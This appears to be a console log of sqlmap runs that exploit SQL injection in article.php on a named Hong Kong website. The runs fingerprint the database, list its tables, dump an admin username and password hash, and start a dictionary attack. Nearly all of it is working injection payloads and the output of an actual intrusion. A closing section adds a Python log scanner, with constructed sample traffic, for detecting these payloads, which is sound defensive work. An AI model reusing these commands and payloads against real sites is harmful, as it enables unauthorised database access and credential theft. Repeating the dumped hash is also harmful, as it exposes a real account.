D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'

[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'

[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>
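Every one of the five runs above replays the same four payload families against article.php?id=, and those payloads are exactly what the web server's access log records. As an added example that is not part of the original post, the following Python scanner (the log lines, client IP and timestamps are constructed) URL-decodes each request, expands sqlmap's CHAR() marker calls into the strings they build, and tags the request with the technique family whose shape it matches.

```python
from __future__ import annotations
import re
from urllib.parse import unquote_plus

# Request-line signatures for the four technique families reported above. The
# numbers (799, 8404, -8474) change per run, so we match the shape, not the values.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)=\1\b", re.I)),
    ("error-based", re.compile(r"FLOOR\(RAND\(0\)\*2\).*\bGROUP BY\b", re.I | re.S)),
    ("UNION query", re.compile(r"\bUNION\s+ALL\s+SELECT\s+NULL\b", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\(\d+\)", re.I)),
]
CHAR_CALL = re.compile(r"\bCHAR\((\d+(?:,\d+)*)\)", re.I)
# Apache/nginx combined-log prefix: ip ident user [time] "METHOD path HTTP/x"
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')

def decode_char_calls(sql: str) -> str:
    """Turn MySQL CHAR(58,99,...) calls into the string they build, so the
    delimiters sqlmap wraps extracted values in (':cvx:' ... ':ncv:') become visible."""
    return CHAR_CALL.sub(
        lambda m: "'" + "".join(chr(int(c)) for c in m.group(1).split(",")) + "'", sql)

def classify_path(path: str) -> list[str]:
    """Names of the technique families whose signature appears in a request path."""
    query = decode_char_calls(unquote_plus(path))
    return [name for name, rx in SIGNATURES if rx.search(query)]

def scan_access_log(lines) -> list[tuple[str, str, list[str]]]:
    """(client_ip, decoded_path, techniques) for every request that matches a signature."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, _method, path = m.groups()
        found = classify_path(path)
        if found:
            hits.append((ip, unquote_plus(path), found))
    return hits

# Constructed sample log: one benign request, then the four payload shapes from the
# sqlmap output above, URL-encoded the way a client sends them (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2011:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [01/Jan/2011:16:53:54 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [01/Jan/2011:16:53:54 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT%20(CASE%20WHEN%20(8404%3D8404)%20THEN%201%20ELSE%200%20END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 1873',
    '203.0.113.7 - - [01/Jan/2011:16:53:55 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65)%20AS%20CHAR),CHAR(32)),CHAR(58,110,99,118,58)),%20NULL,%20NULL,%20NULL%23 HTTP/1.1" 200 4410',
    '203.0.113.7 - - [01/Jan/2011:16:53:55 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5123',
]

if __name__ == "__main__":
    for ip, path, found in scan_access_log(SAMPLE_LOG):
        print(f"{ip}  {', '.join(found)}  {path[:70]}")
```

A single client producing all four families against one parameter within a few seconds, as in the log above, is the sqlmap fingerprint worth alerting on; an error-based hit paired with a 500 response is the strongest single indicator.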